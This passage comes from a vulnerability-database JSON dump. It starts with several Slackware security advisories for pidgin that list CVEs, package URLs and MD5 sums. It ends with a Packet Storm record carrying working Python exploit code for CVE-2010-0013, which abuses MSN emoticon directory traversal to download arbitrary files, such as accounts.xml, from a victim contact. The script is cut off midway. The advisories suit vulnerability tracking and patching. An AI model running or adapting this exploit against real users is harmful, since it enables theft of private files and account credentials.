"Slackware", "OSVersion": "12.1", "packageVersion": "2.6.6", "arch": "i486", "packageFilename": "pidgin-2.6.6-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.6.6", "arch": "i486", "packageFilename": "pidgin-2.6.6-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.6.6", "arch": "i486", "packageFilename": "pidgin-2.6.6-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.6", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-x86_64-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix denial of service issues.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0420\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0423\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.6.6-i486-1_slack13.0.txz: Upgraded.\n This fixes a few denial-of-service flaws as well as other bugs.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0420\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0423\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.6.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.6.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.6.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.6.6-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.6.6-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.6.6-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.6.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nab0bdf3a3de12e14973e603f812cb0de pidgin-2.6.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nf84d789da03ce5e6481c9e04481913a6 pidgin-2.6.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n788ed01f917aa0bfca365e9f77a3490e pidgin-2.6.6-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nc8456f8e3c9fb456afcb49871c557e9f pidgin-2.6.6-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80baaeb8cb042fab6c9764b491c3ebd1 pidgin-2.6.6-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n5ddf6032d36ba29d5ae14ecaedbab88f pidgin-2.6.6-i486-1.txz\n\nSlackware x86_64 -current package:\n451919ccd63ef9aa4245dbe1afb27587 pidgin-2.6.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.6.6-i486-1_slack13.0.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2010-03-10T18:17:44", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-03-10T18:17:44", "id": "SSA-2010-069-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.458630", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:37:01", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.7.0", "arch": "i486", "packageFilename": "pidgin-2.7.0-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.7.0", "arch": "i486", "packageFilename": "pidgin-2.7.0-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.0", "arch": "i486", "packageFilename": "pidgin-2.7.0-i486-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.7.0", "arch": "i486", "packageFilename": "pidgin-2.7.0-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.0", "arch": "x86_64", "packageFilename": "pidgin-2.7.0-x86_64-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.7.0-i486-1_slack13.0.txz: Upgraded.\n Upgraded to pidgin-2.7.0 and pidgin-encryption-3.1.\n The msn_emoticon_msg function in slp.c in the MSN protocol plugin in\n libpurple in Pidgin before 2.7.0 allows remote attackers to cause\n a denial of service (application crash) via a custom emoticon in a\n malformed SLP message.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1624\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.7.0-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.7.0-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.7.0-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.7.0-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.7.0-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.7.0-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.7.0-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nb988b50b9eacdb945e23f87d727cd9ea pidgin-2.7.0-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n18d32120919d0042d370813ab90a7d1d pidgin-2.7.0-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nd3686755cf78d1f1b1c0e61663325c5f pidgin-2.7.0-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n80002e97f1979c926b2a5c72ef7e4847 pidgin-2.7.0-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n03ac23f92b3884911718a9e4fce8d3b3 pidgin-2.7.0-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n2573c594996ef632e013a0ffcb95fe75 pidgin-2.7.0-i486-1.txz\n\nSlackware x86_64 -current package:\nb65ac72c257d0fa7b82728030a79bb36 pidgin-2.7.0-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.7.0-i486-1_slack13.0.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2010-05-18T16:13:01", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624"], "modified": "2010-05-18T16:13:01", "id": "SSA-2010-138-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.441227", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:36:45", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.3", "arch": "x86_64", "packageFilename": "pidgin-2.7.3-x86_64-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack13.1.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.7.3", "arch": "x86_64", "packageFilename": "pidgin-2.7.3-x86_64-1_slack13.1.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\n\nHere are the details from the Slackware 13.1 ChangeLog:\n\npatches/packages/pidgin-2.7.3-i486-1_slack13.1.txz: Upgraded.\n This fixes a crash due to malformed X-Status messages.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2528\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.7.3-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.7.3-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.7.3-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.7.3-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.7.3-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/pidgin-2.7.3-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/pidgin-2.7.3-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.7.3-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.7.3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nfb7245579aa4015f005d0044aeb7fd52 pidgin-2.7.3-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nba4084ade603a89b4e90e46bcd0c2b23 pidgin-2.7.3-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n5f8e30a3bb04c445040b2b089fc6c04c pidgin-2.7.3-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n10bf842cd6588250ee109c336ab89990 pidgin-2.7.3-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nb395ee451748d348a0eec5b92d939581 pidgin-2.7.3-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n16b7bdbe33fa6939b550913c1014680c pidgin-2.7.3-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne84ee7496de30290c1c379b17ce25e32 pidgin-2.7.3-x86_64-1_slack13.1.txz\n\nSlackware -current package:\ne55e0f4e6a656e50dfa01da2da847cd7 xap/pidgin-2.7.3-i486-1.txz\n\nSlackware x86_64 -current package:\ne33c22e97f622500be3b84cde060b503 xap/pidgin-2.7.3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.7.3-i486-1_slack13.1.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2010-08-28T09:53:14", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-2528"], "modified": "2010-08-28T09:53:14", "id": "SSA-2010-240-05", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.462873", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:36:58", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.6.5", "arch": "i486", "packageFilename": "pidgin-2.6.5-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.6.5", "arch": "i486", "packageFilename": "pidgin-2.6.5-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.5", "arch": "x86_64", "packageFilename": "pidgin-2.6.5-x86_64-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.6.5", "arch": "i486", "packageFilename": "pidgin-2.6.5-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.5", "arch": "i486", "packageFilename": "pidgin-2.6.5-i486-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.6.5-i486-1_slack13.0.txz : Upgraded.\n This fixes a directory traversal vulnerability in Pidgin's MSN protocol\n handling that may allow attackers to download arbitrary files.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.6.5-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.6.5-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.6.5-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.6.5-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.6.5-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.6.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.6.5-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n1d779642ef1728ee115d0159803ffce7 pidgin-2.6.5-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n24e6a95472e15299f16ad137ca92c568 pidgin-2.6.5-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nd5186bf297d9647f08e4ff8b8d3496e5 pidgin-2.6.5-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nb73f234503067324f5a16bc1686d0192 pidgin-2.6.5-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ae919fbbfc06731d4b83a9ff65f88a8 pidgin-2.6.5-x86_64-1_slack13.0.txz\n\nSlackware -current package:\nda2ea9b466c31521cf3857fc6998cb4c pidgin-2.6.5-i486-1.txz\n\nSlackware x86_64 -current package:\n362a93381a225db704749b4249013731 pidgin-2.6.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.6.5-i486-1_slack13.0.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2010-01-24T21:20:22", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-24T21:20:22", "id": "SSA-2010-024-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.443459", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:48", "references": [], "edition": 1, "description": "", "reporter": "Mathieu GASPARD", "published": "2010-01-20T00:00:00", "type": "packetstorm", "title": "Pidgin MSN 2.6.4 File Download", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-20T00:00:00", "href": "https://packetstormsecurity.com/files/85413/Pidgin-MSN-2.6.4-File-Download.html", "id": "PACKETSTORM:85413", "sourceData": "`#!/usr/bin/env python \n\"\"\" \nPidgin MSN <= 2.6.4 file download vulnerability \n \n19 January 2010 \n \nMathieu GASPARD (gaspmat@gmail.com) \n \n \nDescription: \nPidgin is a multi-protocol Instant Messenger. \n \nThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi. \nThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \nwhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks. \n \nAffected versions : \nPidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library. \nPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date \n \nPlateforms : \nWindows, Linux, Mac \n \nFix : \nFixed in Pidgin 2.6.5 \nUpdate to the latest version : http://www.pidgin.im/download/ \n \nReferences : \n[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 \n[2] http://www.pidgin.im/news/security/?id=42 \n \nUsage : \nYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn \npython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l] \n \nExample : \n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml] \n \n*********************************************************** \n \nPidgin MSN file download vulnerability (CVE-2010-0013) \n \nUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \n \n*********************************************************** \n \nPlease enter the password for the account \"foo@hotmail.com\" \nPassword: \n[+] Connecting to server \n[+] Authentication in progress \n[+] Synchronisation in progress \n[+] OK, all done, ready to proceed \n[+] Sending request for file \"../accounts.xml\" to \"victim@hotmail.com\" \n[+] Using session_id 974948028 \nCurrent : 3606, total: 3881 (92%) \n[+] Got an answer from the contact \n---------------- \n<?xml version='1.0' encoding='UTF-8' ?> \n \n<account version='1.0'> \n........ \n\"\"\" \n \n \nimport warnings \nwarnings.simplefilter(\"ignore\",DeprecationWarning) \nimport os \nimport sys \ntry: \nimport pymsn \nexcept ImportError: \nprint \"Pymsn couldn't be loaded\" \nprint \"On debian-like systems, the package is python-msn\" \nsys.exit(-1) \nimport gobject \nimport logging \nimport getpass \nimport hashlib \nfrom optparse import OptionParser \nimport signal \nimport time \n \nSERVER_ADDRESS = 'messenger.hotmail.com' \nSERVER_PORT = 1863 \nFD_OUT = sys.stdout \nMAINLOOP = None \n# seconds after which, if we didn't get an answer, we quit \nTIMEOUT = 5 \n \nglobal_client = None \n \ndef quit(): \nMAINLOOP.quit() \nsys.exit(0) \n \n \ndef check_if_succeeds(): \n# if False, we didn't get a chunk so we won't get any file, so we quit \nif global_client.GOT_CONTROL_BLOB == False: \nprint \"[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible\"%TIMEOUT \nprint \"[+] Exiting\" \nglobal_client.quit() \n \n# called when we get the result data, after our request \ndef handle_answer(object, client): \nprint \"\\n[+] Got an answer from the contact\" \nd = object._data \ndata = d.read() \nlength = len(data) \nFD_OUT.write(data) \n# if we wrote output to stdout, don't close it \nif FD_OUT != sys.stdout: \nFD_OUT.close() \nprint \"[+] Wrote %d bytes to file\"%length \nclient.end = time.time() \nduration = client.end - client.begin \nprint \"[+] Download lasted %d seconds at %d bytes/s \"%(duration,(length/duration)) \nclient.quit() \n \ndef my_on_chunk_recv(transport, chunk): \nglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk) \nsession_id = chunk.header.session_id \nblob_id = chunk.header.blob_id \nif session_id == global_client.session_id: \n# first blob is control, we \"squeeze\" it and keep only the second one \nif global_client.GOT_CONTROL_BLOB == False: \n#print \"Got Control blob in our connection (session_id : %d, blob_id: %d)\"%(session_id, blob_id) \nglobal_client.GOT_CONTROL_BLOB = True \nelse: \n# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it \nif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id): \ncurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id] \nprint \"Current : %d, total: %d (%d%%)\\r\"%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)), \nsys.stdout.flush() \n \n \ndef error_handler(self, error_type, error): \n# __on_user_invitation_failed, probably because contact is offline/invisible \nif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\ \nerror == pymsn.event.ContactInviteError.NOT_AVAILABLE: \nprint \"[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible\" \nquit() \n# __on_message_undelivered, probably because contact is offline/invisible \nif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\ \nerror == pymsn.event.MessageError.DELIVERY_FAILED: \nprint \"[*] ERROR, couldn't send message, probably because contact is disconnected/invisible\" \nquit() \nprint \"[*] Unhandled error, error_type : %d , error : %d\"%(error_type, error) \nquit() \n \nclass MyClient(pymsn.Client): \ndef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection): \n# callback to quit \nself.quit = quit \n# victim from whom we request the file \nself.victim = victim \n# just list contacts for this account \nself.list_only = list_only \n# file we request \nself.filename = filename \n# to calculate download duration and speed \nself.begin = 0 \nself.end = 0 \n# session_id of the connection to retrieve the file \nself.session_id = 0 \n# have we already seen the \"control blob\" for this connection \nself.GOT_CONTROL_BLOB = False \npymsn.Client.__init__(self, server) \n# REALLY REALLY HACKISH \n# if contact is disconnected/invisible, a \"NotImplementedError\" exception is raised \n# and it can't be caught AFAIK so it needs to be redefined here \n# handler_class should be SwitchboardClient \nfor handler_class, extra_args in self._switchboard_manager._handlers_class: \nhandler_class._on_error = error_handler \n \n \n \nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore): \ndef __compute_data_hash(self, data): \ndigest = hashlib.sha1() \ndata.seek(0, 0) \nread_data = data.read(1024) \nwhile len(read_data) > 0: \ndigest.update(read_data) \nread_data = data.read(1024) \ndata.seek(0, 0) \nreturn digest.digest() \n \n# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because \n# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here) \ndef _outgoing_session_transfer_completed(self, session, data): \nhandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \nmsn_object._data_sha = self.__compute_data_hash(data) \nsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data) \n \nclass ClientEventHandler(pymsn.event.ClientEventInterface): \n \ndef on_client_error(self, error_type, error): \nif error_type == pymsn.event.ClientErrorType.AUTHENTICATION: \nprint \"[+] Authentication failed, bad login/password\" \nself._client.quit() \nelse: \nprint \"[*] ERROR :\", error_type, \" ->\", error \n \ndef on_client_state_changed(self, state): \n#print \"State changed to %s\" % state \nif state == pymsn.client.ClientState.CLOSED: \nprint \"[+] Connection to server closed\" \nself._client.quit() \n \nif state == pymsn.client.ClientState.CONNECTING: \nif self.current_state != state: \nprint \"[+] Connecting to server\" \nself.current_state = state \nif state == pymsn.client.ClientState.AUTHENTICATING: \nif self.current_state != state: \nprint \"[+] Authentication in progress\" \nself.current_state = state \nif state == pymsn.client.ClientState.SYNCHRONIZING: \nif self.current_state != state: \nprint \"[+] Synchronisation in progress\" \nself.current_state = state \n \nif state == pymsn.client.ClientState.OPEN: \nprint \"[+] OK, all done, ready to proceed\" \nself._client.profile.presence = pymsn.Presence.INVISIBLE \ncontact_dict = {} \nfor i in self._client.address_book.contacts: \ncontact_dict[i.account] = i \nif self._client.list_only: \nfor (k,v) in contact_dict.items(): \nprint k+\" (\"+v.display_name+\")\" \nself._client.quit() \nelse: \nif self._client.victim not in contact_dict.keys(): \nprint \"[*] Error, contact %s not in your contact list\"%self._client.victim \nself._client.quit() \nelse: \ncontact = contact_dict[self._client.victim] \nstore = MyMSNObjectStore(self._client) \nobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=','2jmj7l5rSw0yVb/vlWAYkK/YBwk=') \nprint \"[+] Sending request for file \\\"%s\\\" to \\\"%s\\\"\"%(self._client.filename, self._client.victim) \nself._client.begin = time.time() \nstore.request(object, [handle_answer, self._client]) \n# at this moment, we got only one session_id, the one we will use to request the file \nfor k in store._outgoing_sessions.keys(): \nprint \"[+] Using session_id %d\"%k._id \nself._client.session_id = k._id \n# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download \nself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received \nself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv \n# if no file transfer received from the victim after TIMEOUT seconds, quit \ngobject.timeout_add(TIMEOUT*1000, check_if_succeeds) \n \ndef __init__(self, client): \nself.current_state = None \npymsn.event.ClientEventInterface.__init__(self, client) \n \n \nif __name__ == '__main__': \nprint \"***********************************************************\\n\" \nprint \"Pidgin MSN file download vulnerability (CVE-2010-0013)\\n\" \nprint \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n\" \nprint \"***********************************************************\\n\" \n \nusage = \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \" \nparser = 